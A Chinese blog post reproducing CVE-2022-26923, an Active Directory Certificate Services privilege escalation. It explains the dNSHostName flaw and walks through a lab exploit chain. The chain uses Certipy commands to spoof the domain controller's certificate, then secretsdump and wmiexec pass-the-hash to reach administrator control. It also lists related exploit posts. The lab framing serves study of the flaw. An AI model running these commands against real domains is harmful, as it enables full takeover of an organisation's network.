CVE-2022-26923域提权漏洞

已于 2022-06-06 12:11:14 修改
阅读量3.1k 收藏 5
点赞数 1
分类专栏: 漏洞复现 windows 系统漏洞 文章标签: 系统安全 web安全 安全 安全架构
于 2022-05-24 18:19:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46377671/article/details/124951879
版权

CVE-2022-26923域提权漏洞

参考链接:
http://www.ctfiot.com/40081.html
https://tryhackme.com/room/cve202226923
https://www.bilibili.com/video/BV1hL4y1F79y?spm_id_from=333.337.search-card.all.click
https://github.com/ly4k/Certipy

1.漏洞背景

Windows Active Directory (AD) 不仅用于身份和访问管理,还提供大量服务来帮助您运行和管理您的组织,其中一项服务是 Active Directory 证书服务 (AD CS)。
AD CS 是 Microsoft 的公钥基础结构 ( PKI ) 实施。 AD 在组织中提供了一定程度的信任,因此它可以用作 CA 来证明和委托信任。AD CS 用于多种用途,例如加密文件系统、创建和验证数字签名,甚至是用户身份验证,这使其成为攻击者的有前途的途径。使其成为更危险的攻击媒介的原因在于,证书可以在凭证轮换中幸存下来,这意味着即使重置了受攻击帐户的密码,也不会使恶意生成的证书无效,证书请求和生成的流程:
在这里插入图片描述

AD证书注册流程:要从 AD CS 获取证书,客户端需要经过⼀个称为注册的过程。概括地说,在注册期间,客户端⾸先根据活动目录 Enrollment Services 容器中的对象找到企业 CA。然后,客户端⽣成⼀个公钥/私钥对,并将公钥、证书主题和证书模板名称等其他详细信息⼀起放⼊证书签名请求(CSR)消息中。然后,客户端使⽤其私钥签署 CSR,并将 CSR 发送到企业 CA 服务器。CA 服务器检查客户端是否可以请求证书。如果是,它会通过查找 CSR 中指定的证书模板 AD 对象来确定是否会颁发证书。CA 将检查证书模板 AD 对象的权限是否允许该账户获取证书。如果是,CA 将使用证书模板定义的 “蓝图” 设置(例如,EKU、加密设置和颁发要求等)并使用 CSR 中提供的其他信息(如果证书的模板设置允许)生成证书。CA 使用其私钥签署证书,然后将其返回给客户端。CA 颁发的证书可以提供加密(例如,加密⽂件系统)、数字签名(例如,代码签名)和⾝份验证(例如,对 AD)等多种服务。

2.漏洞原理

默认情况下,域用户可以注册 User 证书模板,域计算机可以注册 Machine 证书模板。两个证书模板都允许客户端身份验证。当用户账户申请 User 模板证书时,用户帐户的用户主体名称(User Principal Name,UPN)将嵌入到证书中以进行识别,这个UPN是唯一的,UPN的值为:用户名@AD域名,不可能同时存在两个具有相同UPN的用户,User 证书模板的 msPKI-Certificate-Name-Flag 属性存在一个 CT_FLAG_SUBJECT_ALT_REQUIRE_UPN 标志位,其指示 CA 将来自 Active Directory 中请求者用户对象的 UPN 属性值(用户名@AD域名)添加到已颁发证书的主题备用名称中。但是Machine证书模板没有UPN属性,那么计算机在使用证书进行身份验证时,是靠什么识别认证账户的呢?会发现证书模板的 msPKI-Certificate-Name-Flag 属性还存在一个 CT_FLAG_SUBJECT_ALT_REQUIRE_DNS 标志位,其指示 CA 将从 Active Directory 中请求者用户对象的 DNS 属性获得的值添加到已颁发证书的主题备用名称中。也就是说,当计算机账户申请证书时,计算机的 DNS 属性值将被嵌入到证书中以进行识别。到此,漏洞产生的原因就出来了,dNSHostName属性值不唯一,通过User用户创建Machine账户,将Machine账户(具有写入权限)的dNSHostName值改为与域控制器的计算机账户相同的dNSHostName值,欺骗AD CS申请到域控制器的AD证书。但是servicePrincipalName属性具有唯一性,它包含dNSHostName,如果dNSHonstName发生改变会带动servicePrintcipalName的RestrictedKrbHost和Host发生改变,由于唯一性会发生报错,所以想要漏洞完成漏洞要删除账户中的servicePrincipalName属性值。

3.利用过程

实验环境:
主机:windows server 2019,带有域环境,并安装AD CS服务。
	域计算机全名:cat7.test.local
	域:test.local
	Ip:192.168.0.107
	普通用户:test1:ABCabc!
Kali:
	Ip:192.168.105
实验环境下,要在kali上做域的域名映射,编写/etc/hosts文件,写域和域主机ip的对应关系。

漏洞存在:
可以使用bloodhound内网渗透工具,通过低权限账号利用采集器脚本进行信息收集,如果发现存在CERTIFICATE SERVICE 组则可以进行尝试。
在这里插入图片描述

提权步骤:

1.泄露低权限ad用户的凭据
2.使用凭据在域中注册新的主机
使用低权限用户生成证书:

certipy req 'test.local/test1:ABCabc!@cat7.test.local' -ca  test-cat7-ca -template User

在这里插入图片描述

Test-cat7-CA 是域名-主机名-CA
通过certipy用kerberos验证是否有效:

certipy auth -pfx test1.pfx

在这里插入图片描述

将计算机AD对象的DNS主机名属性更改为特权主机的主机名属性
申请hostname和域控一样的test4的账号:

certipy account create 'test.local/test1:ABCabc!@cat7.test.local' -user "test4" -dns "cat7.test.local"

在这里插入图片描述

账号会自动加“$”符号,并返回账户密码。
3.删除归因绕过唯一SPN冲突的问题SPN
应该通过工具在第三步完成了
4.使用默认模板请求机器证书
请求Machine证书:

certipy req 'test.local/test4$:sQLNmotDspqSga1A@cat7.test.local' -ca test-cat7-ca -template Machine

在这里插入图片描述

可以看到此时的证书不是test4.pfx,是主机名cat7.pfx,颁发的是域控制器的计算机账户证书。
5.使用收到的模块执行kerberos身份验证,然后就可以作为特权机器账户了
解析票据:

certipy auth -pfx cat7.pfx

在这里插入图片描述

获得hash值。
通过域控制器的计算机账户证书获得administrator的hash值。

secretsdump.py 'test.local/cat7$@cat7.test.local' -hashes 66c32f13f89a8ce3e32ff249d0630d62:66c32f13f89a8ce3e32ff249d0630d62

得到主机的控制权限:

wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:890b06b9397f4ae4b2d55d878132ec9a ADMINISTRATOR@192.168.0.107

在这里插入图片描述

4.流量分析

整个过程从字节流来看都是乱码或者加密,也能看到有cmd.exe相关字节,流量采用SMB2(encrypted SMB3)和TLS协议,只能看到使用SMB协议在两主机间每次登录的用户发生了变化。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

5.修补方案

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26923

cat&seven
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Active Directory 服务权限提升漏洞(CVE-2022-26923)
做自己喜欢的事,并将其发挥到极致!
05-17 2832
文章目录声明一、漏洞描述二、影响范围三、Windows Active Directory (AD)四、Active Directory 证书服务五、环境配置六、漏洞复现七、修复方案八、参考链接 声明 本文章仅用于技术学习、安全研究。切勿用于非授权下渗透攻击行为,切记! 一、漏洞描述 Active Directory 权限提升漏洞 (CVE-2022-26923)允许低权限用户在安装了 Active Directory 证书服务 (AD CS) 服务器角色的默认 Active Directory 环境中
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
Windows提权漏洞CVE-2022-26923分析与复现
C20220511的博客
06-24 3328
当Windows系统的Active Directory证书服务(CS)在上运行时,由于机器账号中的dNSHostName属性不具有唯一性,中普通用户可以将其更改为高权限的控机器账号属性,然后从Active Directory证书服务中获取控机器账户的证书,导致中普通用户权限提升为管理员权限。这一漏洞最早由安全研究员Oliver Lyak发现并公开分析过程和POC,微软在2022年5月的安全更新中对其进行了修补。...
CVE-202226923漏洞分析
阿道夫的博客
01-31 1142
本次漏洞产生的主要原因是计算机账户关键属性的ACL设置问题和ADCS检查客户端身份不严格导致,结合之前的samAccountName欺骗漏洞,AD中涉及身份认证标识的问题不止一次,微软在AD中不用具有唯一性的自动编号字段SID而是其他字段作为身份认证标识在安全方面着实欠妥。本次漏洞利用简单,流量特征不明显难以检测,同时获取的AD证书有效时间长,因此对于AD提权和权限维持都有很高的利用价值。一次,微软在AD中不用具有唯一性的自动编号字段SID而是其他字段作为身份认证标识在安全方面着实欠妥。
简单的内的提权
最新发布
m0_74326506的博客
07-11 1971
42287:微软规定一台机器的机器账号名以$结尾,但又没有做验证,所以一台机器叫dc的话,可以创建有着机器账户属性的dc账户44278:用dc账户向AS申请TGT票据后,然后去向TGS申请ST,在申请ST的时候删除dc这个账户,那么KDC在验证时就查不到dc这个账户,进而查到dc$这个账户,于是就将ST颁给dc¥这个账户。
内网CVE-2022-26923复现
include_voidmain的博客
05-23 1829
0x01 前言 Active Directory权限提升漏洞(CVE-2022-26923)允许低权限用户在安装了 Active Directory证书服务(AD CS)服务器角色的默认Active Directory环境中将权限提升到管理员。 0x02 Active Directory 证书服务 AD CS 是Microsoft 的公钥基础结构 ( PKI ) 实施。由于AD在组织中提供了一定程度的信任,因此它可以用作CA来证明和委托信任。 AD CS用于多种用途,例如加密文件系统、创建和验证数字签名
CVE-2022-26923漏洞分析
wangluo12138的博客
02-01 631
CVE-2022-26923漏洞分析
春秋云境 CVE-2022-4230 夺旗
05-02
**CVE-2022-4230** 是一个存在于 **WP Statistics** WordPress 插件(版本13.2.9及以前)中的安全漏洞。该漏洞的主要原因是插件在处理特定参数时没有进行充分的数据转义,从而导致SQL注入攻击成为可能。具体来说: ...
sudo-1.9.12p1,解决cve-2022-43995
11-08
"sudo-1.9.12p1"是sudo的一个特定版本,该版本发布是为了修复一个重要的安全漏洞CVE-2022-43995。 **sudo的基础知识** sudo的核心功能在于提供一种受控的权限提升机制,以增强系统的安全性。它通过sudoers文件来...
新版脏牛Linux内核提权漏洞CVE-2022-0847
03-09
5.8 中的一个漏洞,它允许覆盖任意只读文件中的数据。这会导致权限提升,因为非特权进程可以将代码注入根进程。 修复版本:Linux 5.16.11、5.15.25 和 5.10.102 中修复。
最新靶场场景 Active Directory 权限提升漏洞(CVE-2022-26923)
ZetaByte的博客
05-29 550
近日,Active Directory 服务组件被爆出存在特权提升漏洞,蛇矛实验室率先构建出了完整的靶场复现和利用环境,目标环境是基于"火天网演攻防演训靶场"进行搭建,通过火天网演中的环境构建模块,可以灵活的对目标网络进行设计和配置,并且可以快速进行场景搭建和复现工作。
cve-2022-26923漏洞复现+实战+踩坑记录
恒安嘉新66的博客
06-11 2767
一、描述cve-2022-26923内权限提升漏洞,5月份以前的存在证书服务器的通杀控管理员权限,危害巨大。 #漏洞 #控证书漏洞
渗透笔记-ADCS 提权-ESC1
NoooEmotion的博客
02-02 1655
AD CS(Active Directory 证书服务)中的企业CA使用证书模板定义设置颁发证书,这些证书模板是注册策略和预定义证书设置的集合,并包含诸如此证书的有效期是多长?、证书的用途是什么?、主题是如何指定的?、谁可以申请证书?,以及无数其他设置。证书模板有一组特定的设置,这使得它们非常容易受到攻击。
提权CVE-2021-42278漏洞复现
一只爱吃橙子的羊
11-21 1307
提权CVE-2021-42278漏洞复现,本文仅为验证漏洞,在本地环境测试验证,无其它目的。
[内网渗透]—NetLogon 提权漏洞(CVE-2020-1472)
Sentiment的博客
12-16 628
CVE-2020-1472 是⼀个 windows 控中严重的远程权限提升漏洞,攻击者通过 NetLogon,建⽴与控间易受攻击的安全通道时,可利⽤此漏洞获取管访问权限(将控中保存在AD中的管理员password设置为空);其漏洞原理是发⽣在 RPC 认证过程的过程中,由于错误的使⽤了 AES-CFB8 加密所致。获取了一个加入了的计算机权限,在普通账号的情况下,将管密码置空,导出管hash,然后进行连接。
提权 (CVE-2021-42278 & CVE-2021-42287) 漏洞利用
Captain_RB的博客
07-03 3148
2021年11月,Microsoft 曝出了两个关于 Windows AD 提权漏洞CVE-2021-42278 & CVE-2021-42287,CVSS V3.1评分均为8.8,两个漏洞组合可导致内普通用户提升至管权限,文章主要对漏洞利用使用的两种自动化脚本进行介绍。...............
Windows控常见0day及利用漏洞汇集
Ms08067安全实验室
01-10 2794
本文对近几年出现的Windows控相关漏洞及利用方法进行整理,方便检测存在的漏洞,目前来看主要集中在本地权限提升、打印机服务利用、exchange等。 1.1Kerberos 校验和漏洞MS14-068(CVE-2014-6324) Microsoft Windows Server 2003 SP2、Windows Vista SP2、Windows Server 2008...
cve-2022-26923复现——提权漏洞复现
m0_46317063的博客
04-23 770
cve-2022-26923提权漏洞复现
CVE-2022-37969 CLFS 提权漏洞
06-13
CVE-2022-37969是一个CLFS(Component Library for Feature Sequence)提权漏洞,该漏洞影响Windows 10版本1709、1803、1809、1903、1909、2004、20H2、21H1和Windows Server 2019的CLFS驱动程序,攻击者可以利用该...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值